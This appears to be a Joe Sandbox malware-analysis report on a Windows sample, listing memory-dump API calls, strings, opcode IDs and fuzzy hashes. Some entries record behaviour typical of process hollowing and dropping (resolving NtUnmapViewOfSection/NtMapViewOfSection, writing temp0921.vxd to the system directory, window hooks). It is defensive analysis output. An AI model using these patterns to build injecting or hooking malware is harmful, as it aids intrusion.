                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 329905633bc8b0a94ac0c240274939d2d8898a23d6a58f63f4b797b9910009b9
                                                                                                                                              • Instruction ID: 47aef34c857a658a6300e4a75fbe3735692d0a3d265a10cf1240a7a73e3e61bd
                                                                                                                                              • Opcode Fuzzy Hash: 329905633bc8b0a94ac0c240274939d2d8898a23d6a58f63f4b797b9910009b9
                                                                                                                                              • Instruction Fuzzy Hash: 6B1151156092C82FDF094A6C84B62EE7FA18FA7250F48D1DDADD997383C06C860ED764
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 028772365812209ae3b034f4d7fb155149baea42fefa9e56ea01cf4f30ab10be
                                                                                                                                              • Instruction ID: 9134e66de6b4e5ea04456834c8a1a991d62c2b8f5af9fc7be7d8a5352cf769b0
                                                                                                                                              • Opcode Fuzzy Hash: 028772365812209ae3b034f4d7fb155149baea42fefa9e56ea01cf4f30ab10be
                                                                                                                                              • Instruction Fuzzy Hash: F41196162451886FDF0D496D84F73DE2FA1CBA7240F48919A989987783C02D811FE764
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 69f6bb77fbef33ec5531855511c1a3eb96a541a6779409ec123430190a6b4409
                                                                                                                                              • Instruction ID: 45a5f8739c1aa389b1f2b86d6161cac0944a6aa1e8b0d199d8837934870e1e0a
                                                                                                                                              • Opcode Fuzzy Hash: 69f6bb77fbef33ec5531855511c1a3eb96a541a6779409ec123430190a6b4409
                                                                                                                                              • Instruction Fuzzy Hash: 41F06272E102289BCF14DFA9CD416CDFBF1AF88724F25821AE514B3291CA7959049B68
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • RegisterClipboardFormatA.USER32(Native), ref: 0042C028
                                                                                                                                              • RegisterClipboardFormatA.USER32(OwnerLink), ref: 0042C031
                                                                                                                                              • RegisterClipboardFormatA.USER32(ObjectLink), ref: 0042C03B
                                                                                                                                              • RegisterClipboardFormatA.USER32(Embedded Object), ref: 0042C045
                                                                                                                                              • RegisterClipboardFormatA.USER32(Embed Source), ref: 0042C04F
                                                                                                                                              • RegisterClipboardFormatA.USER32(Link Source), ref: 0042C059
                                                                                                                                              • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 0042C063
                                                                                                                                              • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 0042C06D
                                                                                                                                              • RegisterClipboardFormatA.USER32(FileName), ref: 0042C077
                                                                                                                                              • RegisterClipboardFormatA.USER32(FileNameW), ref: 0042C081
                                                                                                                                              • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 0042C08B
                                                                                                                                              • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 0042C095
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClipboardFormatRegister
                                                                                                                                              • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                                              • API String ID: 1228543026-2889995556
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00429F31
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00429F3C
                                                                                                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 00429F6D
                                                                                                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 00429F75
                                                                                                                                              • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 00429F82
                                                                                                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 00429F9C
                                                                                                                                              • ConvertDefaultLocale.KERNEL32(000003FF), ref: 00429FA2
                                                                                                                                              • GetVersion.KERNEL32 ref: 00429FB0
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00429FD5
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00429FFB
                                                                                                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 0042A047
                                                                                                                                              • ConvertDefaultLocale.KERNEL32(76170A60), ref: 0042A04D
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0042A058
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
                                                                                                                                              • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                                              • API String ID: 780041395-483790700
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000104,?), ref: 00403B29
                                                                                                                                                • Part of subcall function 00401FE9: lstrlenA.KERNEL32(?,?,?,?,00402E72,?), ref: 00402008
                                                                                                                                              • CharLowerA.USER32(?,?,00000004,?), ref: 00403B60
                                                                                                                                              • DeleteFileA.KERNEL32(00446BF0), ref: 00403F98
                                                                                                                                                • Part of subcall function 00402C6D: MessageBoxA.USER32(00000000,?,00000000,00000030), ref: 00402D19
                                                                                                                                                • Part of subcall function 0040A0A4: GetVersionExA.KERNEL32(?), ref: 0040A0E9
                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00403C90
                                                                                                                                              • CoUninitialize.OLE32 ref: 00403CAD
                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00403D01
                                                                                                                                              • CreateFileA.KERNEL32(C0000000,00000003,00000000,00000002,00000090,00000000), ref: 00403D3C
                                                                                                                                              • WriteFile.KERNEL32(00000000,0042FA48,00001270,?,00000000), ref: 00403D60
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00403D6A
                                                                                                                                              • DeleteFileA.KERNEL32(00447800), ref: 00403DE2
                                                                                                                                                • Part of subcall function 0040251B: CharNextA.USER32(?,?,00000000,00000000,00402825,?,?,?,00000000,?), ref: 00402548
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$CharDelete$CloseCreateDirectoryHandleInitializeLowerMessageModuleNameNextSystemUninitializeVersionWritelstrlen
                                                                                                                                              • String ID: %s%s$%s%s%s$.dll$\\.\$temp0921.vxd
                                                                                                                                              • API String ID: 1553515636-1906822863
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • CallNextHookEx.USER32(?,00000003,?,?), ref: 004257ED
                                                                                                                                              • GetClassLongA.USER32(?,000000E6), ref: 00425832
                                                                                                                                              • GlobalGetAtomNameA.KERNEL32(?,00000000,00000005), ref: 0042585E
                                                                                                                                              • lstrcmpiA.KERNEL32(?,ime), ref: 0042586D
                                                                                                                                              • SetWindowLongA.USER32(?,000000FC,Function_00024DF1), ref: 004258A7
                                                                                                                                              • CallNextHookEx.USER32(?,00000003,?,?), ref: 004259A2
                                                                                                                                              • UnhookWindowsHookEx.USER32(?), ref: 004259B3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Hook$CallLongNext$AtomClassGlobalNameUnhookWindowWindowslstrcmpi
                                                                                                                                              • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                                              • API String ID: 1393834995-4034971020
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(USER32,?,?,?,0040CFFC), ref: 0040CED4
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 0040CEF0
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0040CF01
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0040CF12
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 0040CF23
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0040CF34
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0040CF45
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 0040CF56
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                              • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                                              • API String ID: 667068680-68207542
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,RtlInitUnicodeString,?,?,?,0040B8FD), ref: 0040B60D
                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040B616
                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,0040B8FD), ref: 0040B62B
                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040B62E
                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtOpenSection,?,?,?,0040B8FD), ref: 0040B63F
                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040B642
                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtMapViewOfSection,?,?,?,0040B8FD), ref: 0040B653
                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040B656
                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,RtlNtStatusToDosError,?,?,?,0040B8FD), ref: 0040B667
                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040B66A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                              • String ID: NtMapViewOfSection$NtOpenSection$NtUnmapViewOfSection$RtlInitUnicodeString$RtlNtStatusToDosError$ntdll.dll
                                                                                                                                              • API String ID: 1646373207-1987783197
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • CharNextA.USER32(?,?,00000000,004462BC,?,004462BC,%s%s%s,?,00430E68,temp0921.vxd), ref: 0040224A
                                                                                                                                              • CharNextA.USER32(00000000,?,004462BC,%s%s%s,?,00430E68,temp0921.vxd), ref: 0040228E
                                                                                                                                              • CharNextA.USER32(00000000,?,004462BC,%s%s%s,?,00430E68,temp0921.vxd), ref: 004022BB
                                                                                                                                              • CharNextA.USER32(00000000), ref: 004022D0
                                                                                                                                              • CharNextA.USER32(00000000), ref: 004022E4
                                                                                                                                              • CharNextA.USER32(00000000), ref: 00402305
                                                                                                                                              • CharNextA.USER32(00000000), ref: 00402361
                                                                                                                                              • lstrlenA.KERNEL32(-00010073), ref: 00402438
                                                                                                                                              • OutputDebugStringA.KERNEL32(Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CMyString class.), ref: 0040246B
                                                                                                                                              • DebugBreak.KERNEL32 ref: 00402471
                                                                                                                                              • CharNextA.USER32(?,?,00000000,004462BC,?,004462BC,%s%s%s,?,00430E68,temp0921.vxd), ref: 004024BD
                                                                                                                                              • CharNextA.USER32(?,?,004462BC,%s%s%s,?,00430E68,temp0921.vxd), ref: 004024C6
                                                                                                                                              • wvsprintfA.USER32(?,?,?), ref: 004024ED
                                                                                                                                              Strings
                                                                                                                                              • Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CMyString class., xrefs: 00402466
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharNext$Debug$BreakOutputStringlstrlenwvsprintf
                                                                                                                                              • String ID: Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CMyString class.
                                                                                                                                              • API String ID: 3364312739-4257885759
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32(user32.dll,0043A978,0000000C,?), ref: 0041E5E2
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0041E5FE
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0041E60F
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0041E61C
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 0041E632
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0041E643
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                              • String ID: $GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                                                                                              • API String ID: 2238633743-752805172
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Focus$Message$ParentStateWindow$BeepDialogSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 275928742-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0042663C: GetWindowLongA.USER32(?,000000F0), ref: 00426648
                                                                                                                                              • GetParent.USER32(?), ref: 0042405C
                                                                                                                                              • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 0042407F
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00424098
                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 004240AB
                                                                                                                                              • CopyRect.USER32(?,?), ref: 004240F8
                                                                                                                                              • CopyRect.USER32(?,?), ref: 00424102
                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0042410B
                                                                                                                                              • CopyRect.USER32(?,?), ref: 00424127
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 808654186-0
                                                                                                                                              • Opcode ID: 5c1e3401e94f9ddfb7b0304fefac56a9f4397806790fe2ce614e2b01d900ef57
                                                                                                                                              • Instruction ID: 208623173516fe0c4c79c90a83d200c0856f8fa8b1e61f7fada478de943c47ba
                                                                                                                                              • Opcode Fuzzy Hash: 5c1e3401e94f9ddfb7b0304fefac56a9f4397806790fe2ce614e2b01d900ef57
                                                                                                                                              • Instruction Fuzzy Hash: 31518771A00229ABDB10DBA8DC85EEF77B9EF84314F554125F601F3280D774A9468B58
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(?,00439AF0), ref: 0042D37B
                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 0042D3A1
                                                                                                                                              • lstrlenA.KERNEL32(?,00439AF0), ref: 0042D3B9
                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0042D3DD
                                                                                                                                              • lstrlenA.KERNEL32(?,0000F108,?,00000100,d}C,00439AF0), ref: 0042D42E
                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0042D454
                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0042D474
                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0042D498
                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0042D4C1
                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0042D4E2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocStringlstrlen
                                                                                                                                              • String ID: d}C
                                                                                                                                              • API String ID: 98960487-3319508351
                                                                                                                                              • Opcode ID: 66b24d67ede51495c4957cf5ca69243bc8b93e62e85c6dcf95a10c59674b6767
                                                                                                                                              • Instruction ID: 185ff175cf529db1f2f1588e15c7f847109819f6a9f20bd73b9045780a2bba21
                                                                                                                                              • Opcode Fuzzy Hash: 66b24d67ede51495c4957cf5ca69243bc8b93e62e85c6dcf95a10c59674b6767
                                                                                                                                              • Instruction Fuzzy Hash: 7451A376A00219ABCB10EF75DD45A9ABBB8EF05314F508527F815D7241D738E990CFA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              • assertion failed: self.ref_count() > 0, xrefs: 025D5230
                                                                                                                                              • [internal exception] blocking task ran twice./registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\blocking\task.rs, xrefs: 025D52C9
                                                                                                                                              • attempt to divide by zero, xrefs: 025D521C
                                                                                                                                              • assertion failed: curr.is_join_waker_set(), xrefs: 025D54B4
                                                                                                                                              • assertion failed: curr.is_join_interested(), xrefs: 025D54A0, 025D556E
                                                                                                                                              • assertion failed: prev.ref_count() >= 1, xrefs: 025D5582, 025D55B5, 025D561A
                                                                                                                                              • Invalid, xrefs: 025D528D, 025D54DE
                                                                                                                                              • assertion failed: next.is_notified()/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\task\state.rs, xrefs: 025D5208
                                                                                                                                              • n failed: prev.ref_count() >= 2, xrefs: 025D57BF
                                                                                                                                              • cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs, xrefs: 025D5325
                                                                                                                                              • assertion failed: snapshot.is_complete()/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\task\harness.rs, xrefs: 025D54F2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Invalid$[internal exception] blocking task ran twice./registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\blocking\task.rs$assertion failed: curr.is_join_interested()$assertion failed: curr.is_join_waker_set()$assertion failed: next.is_notified()/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\task\state.rs$assertion failed: prev.ref_count() >= 1$assertion failed: self.ref_count() > 0$assertion failed: snapshot.is_complete()/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\task\harness.rs$attempt to divide by zero$cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs$n failed: prev.ref_count() >= 2
                                                                                                                                              • API String ID: 0-2035208961
                                                                                                                                              • Opcode ID: ccc0532e2d474efb6eb899a27a28ec1aa5855810d5f0c1f566743963fd548357
                                                                                                                                              • Instruction ID: b842016d36dff0b52c9c6066cfe70e8bffce0c0eaff61ffa640fd49918ae21ab
                                                                                                                                              • Opcode Fuzzy Hash: ccc0532e2d474efb6eb899a27a28ec1aa5855810d5f0c1f566743963fd548357
                                                                                                                                              • Instruction Fuzzy Hash: 1CD124706002518BDB24DF2CC95075ABBE2FFC5325F68856DE85A9B390EB71EC42CB85
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025CFEC0: HeapFree.KERNEL32(00000000,?), ref: 025D0037
                                                                                                                                                • Part of subcall function 025CFEC0: HeapFree.KERNEL32(00000000,?), ref: 025D004C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259A574
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259A58F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID: Invalid
                                                                                                                                              • API String ID: 3298025750-874791708
                                                                                                                                              • Opcode ID: 048b79132d7841d444e4610d40c491225c5975a6c75bfd698fb6a53a420acd23
                                                                                                                                              • Instruction ID: dd95fdc362daacb7e9d45d855ab1c3f83a0eecbc1423566db610e315958f924a
